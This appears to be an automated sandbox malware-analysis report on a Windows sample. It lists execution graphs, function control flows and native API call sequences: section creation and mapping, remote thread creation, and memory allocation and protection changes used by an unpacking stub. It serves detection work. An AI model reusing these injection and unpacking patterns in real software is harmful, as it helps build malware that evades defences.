                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      Disassembly

                                                                                                                                      Reset < >

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:8%
                                                                                                                                        Dynamic/Decrypted Code Coverage:42.6%
                                                                                                                                        Signature Coverage:43.4%
                                                                                                                                        Total number of Nodes:122
                                                                                                                                        Total number of Limit Nodes:4
                                                                                                                                        execution_graph 3309 402e40 3311 402e37 3309->3311 3312 402edf 3311->3312 3313 4018e6 3311->3313 3314 4018f5 3313->3314 3315 40192e Sleep 3314->3315 3316 401949 3315->3316 3318 40195a 3316->3318 3319 401514 3316->3319 3318->3312 3320 401524 3319->3320 3321 4015c4 NtDuplicateObject 3320->3321 3330 4016e0 3320->3330 3322 4015e1 NtCreateSection 3321->3322 3321->3330 3323 401661 NtCreateSection 3322->3323 3324 401607 NtMapViewOfSection 3322->3324 3326 40168d 3323->3326 3323->3330 3324->3323 3325 40162a NtMapViewOfSection 3324->3325 3325->3323 3327 401648 3325->3327 3328 401697 NtMapViewOfSection 3326->3328 3326->3330 3327->3323 3329 4016be NtMapViewOfSection 3328->3329 3328->3330 3329->3330 3330->3318 3426 401542 3427 40153b 3426->3427 3428 4015c4 NtDuplicateObject 3427->3428 3437 4016e0 3427->3437 3429 4015e1 NtCreateSection 3428->3429 3428->3437 3430 401661 NtCreateSection 3429->3430 3431 401607 NtMapViewOfSection 3429->3431 3433 40168d 3430->3433 3430->3437 3431->3430 3432 40162a NtMapViewOfSection 3431->3432 3432->3430 3434 401648 3432->3434 3435 401697 NtMapViewOfSection 3433->3435 3433->3437 3434->3430 3436 4016be NtMapViewOfSection 3435->3436 3435->3437 3436->3437 3462 503179 3463 503188 3462->3463 3464 503919 3 API calls 3463->3464 3465 503191 3464->3465 3369 4b0001 3370 4b0005 3369->3370 3375 4b092b GetPEB 3370->3375 3372 4b0030 3377 4b003c 3372->3377 3376 4b0972 3375->3376 3376->3372 3378 4b0049 3377->3378 3379 4b0e0f 2 API calls 3378->3379 3380 4b0223 3379->3380 3381 4b0d90 GetPEB 3380->3381 3382 4b0238 VirtualAlloc 3381->3382 3383 4b0265 3382->3383 3384 4b02ce VirtualProtect 3383->3384 3386 4b030b 3384->3386 3385 4b0439 VirtualFree 3389 4b04be LoadLibraryA 3385->3389 3386->3385 3388 4b08c7 3389->3388 3390 4b0005 3391 4b092b GetPEB 3390->3391 3392 4b0030 3391->3392 3393 4b003c 7 API calls 3392->3393 3394 4b0038 3393->3394 3489 402dd0 3490 402ddc 3489->3490 3491 4018e6 8 API calls 3490->3491 3492 402edf 3490->3492 3491->3492 3407 4018f1 3408 4018f6 3407->3408 3409 40192e Sleep 3408->3409 3410 401949 3409->3410 3411 401514 7 API calls 3410->3411 3412 40195a 3410->3412 3411->3412 3476 401915 3477 40191a 3476->3477 3478 4018c6 3476->3478 3479 40192e Sleep 3477->3479 3480 401949 3479->3480 3481 401514 7 API calls 3480->3481 3482 40195a 3480->3482 3481->3482 3331 4b003c 3332 4b0049 3331->3332 3344 4b0e0f SetErrorMode SetErrorMode 3332->3344 3337 4b0265 3338 4b02ce VirtualProtect 3337->3338 3340 4b030b 3338->3340 3339 4b0439 VirtualFree 3343 4b04be LoadLibraryA 3339->3343 3340->3339 3342 4b08c7 3343->3342 3345 4b0223 3344->3345 3346 4b0d90 3345->3346 3347 4b0dad 3346->3347 3348 4b0dbb GetPEB 3347->3348 3349 4b0238 VirtualAlloc 3347->3349 3348->3349 3349->3337 3350 402f97 3351 4030ee 3350->3351 3352 402fc1 3350->3352 3352->3351 3353 40307c RtlCreateUserThread NtTerminateProcess 3352->3353 3353->3351 3354 503168 3355 503171 3354->3355 3358 503919 3355->3358 3359 503934 3358->3359 3360 50393d CreateToolhelp32Snapshot 3359->3360 3361 503959 Module32First 3359->3361 3360->3359 3360->3361 3362 503968 3361->3362 3364 503191 3361->3364 3365 5035d8 3362->3365 3366 503603 3365->3366 3367 50364c 3366->3367 3368 503614 VirtualAlloc 3366->3368 3367->3367 3368->3367 3466 402d7b 3468 402d38 3466->3468 3467 4018e6 8 API calls 3469 402dc7 3467->3469 3468->3466 3468->3467 3468->3469 3413 4014fe 3414 401506 3413->3414 3415 401531 3413->3415 3416 4015c4 NtDuplicateObject 3415->3416 3425 4016e0 3415->3425 3417 4015e1 NtCreateSection 3416->3417 3416->3425 3418 401661 NtCreateSection 3417->3418 3419 401607 NtMapViewOfSection 3417->3419 3421 40168d 3418->3421 3418->3425 3419->3418 3420 40162a NtMapViewOfSection 3419->3420 3420->3418 3422 401648 3420->3422 3423 401697 NtMapViewOfSection 3421->3423 3421->3425 3422->3418 3424 4016be NtMapViewOfSection 3423->3424 3423->3425 3424->3425

                                                                                                                                        Executed Functions

                                                                                                                                        Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 85 401514-401533 87 401524-40152f 85->87 88 401536-40156e call 401193 85->88 87->88 97 401570 88->97 98 401573-401578 88->98 97->98 100 401898-4018a0 98->100 101 40157e-40158f 98->101 100->98 104 4018a5-4018b7 100->104 105 401595-4015be 101->105 106 401896 101->106 112 4018c5 104->112 113 4018bc-4018e3 call 401193 104->113 105->106 114 4015c4-4015db NtDuplicateObject 105->114 106->104 112->113 114->106 116 4015e1-401605 NtCreateSection 114->116 118 401661-401687 NtCreateSection 116->118 119 401607-401628 NtMapViewOfSection 116->119 118->106 123 40168d-401691 118->123 119->118 121 40162a-401646 NtMapViewOfSection 119->121 121->118 124 401648-40165e 121->124 123->106 126 401697-4016b8 NtMapViewOfSection 123->126 124->118 126->106 128 4016be-4016da NtMapViewOfSection 126->128 128->106 130 4016e0 call 4016e5 128->130
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                        • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                                        • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                                                                                        • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                                                                                        • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69
                                                                                                                                        Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 151 4018a5-4018b7 147->151 152 401595-4015be 148->152 153 401896 148->153 159 4018c5 151->159 160 4018bc-4018e3 call 401193 151->160 152->153 161 4015c4-4015db NtDuplicateObject 152->161 153->151 159->160 161->153 163 4015e1-401605 NtCreateSection 161->163 165 401661-401687 NtCreateSection 163->165 166 401607-401628 NtMapViewOfSection 163->166 165->153 170 40168d-401691 165->170 166->165 168 40162a-401646 NtMapViewOfSection 166->168 168->165 171 401648-40165e 168->171 170->153 173 401697-4016b8 NtMapViewOfSection 170->173 171->165 173->153 175 4016be-4016da NtMapViewOfSection 173->175 175->153 177 4016e0 call 4016e5 175->177
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1652636561-0
                                                                                                                                        • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                                        • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                                                                                        • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                                                                                        • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24
                                                                                                                                        Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 195 4018a5-4018b7 191->195 196 401595-4015be 192->196 197 401896 192->197 203 4018c5 195->203 204 4018bc-4018e3 call 401193 195->204 196->197 205 4015c4-4015db NtDuplicateObject 196->205 197->195 203->204 205->197 207 4015e1-401605 NtCreateSection 205->207 209 401661-401687 NtCreateSection 207->209 210 401607-401628 NtMapViewOfSection 207->210 209->197 214 40168d-401691 209->214 210->209 212 40162a-401646 NtMapViewOfSection 210->212 212->209 215 401648-40165e 212->215 214->197 217 401697-4016b8 NtMapViewOfSection 214->217 215->209 217->197 219 4016be-4016da NtMapViewOfSection 217->219 219->197 221 4016e0 call 4016e5 219->221
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                        • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                                        • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                                                                                        • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                                        • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24
                                                                                                                                        Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 234 4018a5-4018b7 230->234 235 401595-4015be 231->235 236 401896 231->236 242 4018c5 234->242 243 4018bc-4018e3 call 401193 234->243 235->236 244 4015c4-4015db NtDuplicateObject 235->244 236->234 242->243 244->236 246 4015e1-401605 NtCreateSection 244->246 248 401661-401687 NtCreateSection 246->248 249 401607-401628 NtMapViewOfSection 246->249 248->236 253 40168d-401691 248->253 249->248 251 40162a-401646 NtMapViewOfSection 249->251 251->248 254 401648-40165e 251->254 253->236 256 401697-4016b8 NtMapViewOfSection 253->256 254->248 256->236 258 4016be-4016da NtMapViewOfSection 256->258 258->236 260 4016e0 call 4016e5 258->260
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                        • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                                        • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                                                                                        • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                                        • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24
                                                                                                                                        Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 274 4018a5-4018b7 270->274 275 401595-4015be 271->275 276 401896 271->276 282 4018c5 274->282 283 4018bc-4018e3 call 401193 274->283 275->276 284 4015c4-4015db NtDuplicateObject 275->284 276->274 282->283 284->276 286 4015e1-401605 NtCreateSection 284->286 288 401661-401687 NtCreateSection 286->288 289 401607-401628 NtMapViewOfSection 286->289 288->276 293 40168d-401691 288->293 289->288 291 40162a-401646 NtMapViewOfSection 289->291 291->288 294 401648-40165e 291->294 293->276 296 401697-4016b8 NtMapViewOfSection 293->296 294->288 296->276 298 4016be-4016da NtMapViewOfSection 296->298 298->276 300 4016e0 call 4016e5 298->300
                                                                                                                                        APIs
                                                                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1546783058-0
                                                                                                                                        • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                                        • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                                                                                        • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                                        • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24
                                                                                                                                        Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 315 40306c 313->315 314->306 316 403070-403075 314->316 315->316 316->304 317 403077-40307a 316->317 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1921587553-0
                                                                                                                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                        • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                                                                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                        • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5
                                                                                                                                        Function 00503919 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 319 503919-503932 320 503934-503936 319->320 321 503938 320->321 322 50393d-503949 CreateToolhelp32Snapshot 320->322 321->322 323 503959-503966 Module32First 322->323 324 50394b-503951 322->324 325 503968-503969 call 5035d8 323->325 326 50396f-503977 323->326 324->323 331 503953-503957 324->331 329 50396e 325->329 329->326 331->320 331->323
                                                                                                                                        APIs
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00503941
                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 00503961
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1726254840.00000000004F1000.00000040.00000020.00020000.00000000.sdmp, Offset: 004F1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_4f1000_ctMI3TYXpX.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3833638111-0
                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                        • Instruction ID: 9b7ec3692cb4cd72cc765cc2a760264b54496de3f36314acdafc3b490a3adcef
                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                        • Instruction Fuzzy Hash: E7F09631200715BBE7303FF9AC8DB6E7AECBF49724F140928E642914C0DBB0ED454661
                                                                                                                                        Function 004B003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 0 4b003c-4b0047 1 4b0049 0->1 2 4b004c-4b0263 call 4b0a3f call 4b0e0f call 4b0d90 VirtualAlloc 0->2 1->2 17 4b028b-4b0292 2->17 18 4b0265-4b0289 call 4b0a69 2->18 20 4b02a1-4b02b0 17->20 22 4b02ce-4b03c2 VirtualProtect call 4b0cce call 4b0ce7 18->22 20->22 23 4b02b2-4b02cc 20->23 29 4b03d1-4b03e0 22->29 23->20 30 4b0439-4b04b8 VirtualFree 29->30 31 4b03e2-4b0437 call 4b0ce7 29->31 33 4b04be-4b04cd 30->33 34 4b05f4-4b05fe 30->34 31->29 36 4b04d3-4b04dd 33->36 37 4b077f-4b0789 34->37 38 4b0604-4b060d 34->38 36->34 40 4b04e3-4b0505 36->40 41 4b078b-4b07a3 37->41 42 4b07a6-4b07b0 37->42 38->37 43 4b0613-4b0637 38->43 52 4b0517-4b0520 40->52 53 4b0507-4b0515 40->53 41->42 44 4b086e-4b08be LoadLibraryA 42->44 45 4b07b6-4b07cb 42->45 46 4b063e-4b0648 43->46 51 4b08c7-4b08f9 44->51 48 4b07d2-4b07d5 45->48 46->37 49 4b064e-4b065a 46->49 54 4b07d7-4b07e0 48->54 55 4b0824-4b0833 48->55 49->37 50 4b0660-4b066a 49->50 56 4b067a-4b0689 50->56 58 4b08fb-4b0901 51->58 59 4b0902-4b091d 51->59 60 4b0526-4b0547 52->60 53->60 61 4b07e2 54->61 62 4b07e4-4b0822 54->62 57 4b0839-4b083c 55->57 63 4b068f-4b06b2 56->63 64 4b0750-4b077a 56->64 57->44 65 4b083e-4b0847 57->65 58->59 66 4b054d-4b0550 60->66 61->55 62->48 69 4b06ef-4b06fc 63->69 70 4b06b4-4b06ed 63->70 64->46 71 4b084b-4b086c 65->71 72 4b0849 65->72 67 4b05e0-4b05ef 66->67 68 4b0556-4b056b 66->68 67->36 74 4b056f-4b057a 68->74 75 4b056d 68->75 76 4b074b 69->76 77 4b06fe-4b0748 69->77 70->69 71->57 72->44 78 4b059b-4b05bb 74->78 79 4b057c-4b0599 74->79 75->67 76->56 77->76 84 4b05bd-4b05db 78->84 79->84 84->66
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004B024D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1726159167.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_4b0000_ctMI3TYXpX.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID: cess$kernel32.dll
                                                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                        • Instruction ID: 3ab0f07624891138f2a196dea9d1c45aa3da684c3a44e81f7e50d60f331bd9e4
                                                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                        • Instruction Fuzzy Hash: AE527974A00229DFDB64CF58C984BA9BBB1BF09305F1480DAE50DAB351DB34AE85DF25
                                                                                                                                        Function 004B0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 332 4b0e0f-4b0e24 SetErrorMode * 2 333 4b0e2b-4b0e2c 332->333 334 4b0e26 332->334 334->333
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,004B0223,?,?), ref: 004B0E19
                                                                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,004B0223,?,?), ref: 004B0E1E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1726159167.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_4b0000_ctMI3TYXpX.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                        • Instruction ID: eed68f84607e2b327b3ebbdec56108b8437801bff84edba81ed917c1dc319f98
                                                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                        • Instruction Fuzzy Hash: DED0123114512877DB002A94DC09BCE7B1CDF05B63F008411FB0DD9180C774994046E9
                                                                                                                                        Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 335 4018e6-40194b call 401193 Sleep call 40141f 349 40195a-4019a5 call 401193 335->349 350 40194d-401955 call 401514 335->350 350->349
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1885482327-0
                                                                                                                                        • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
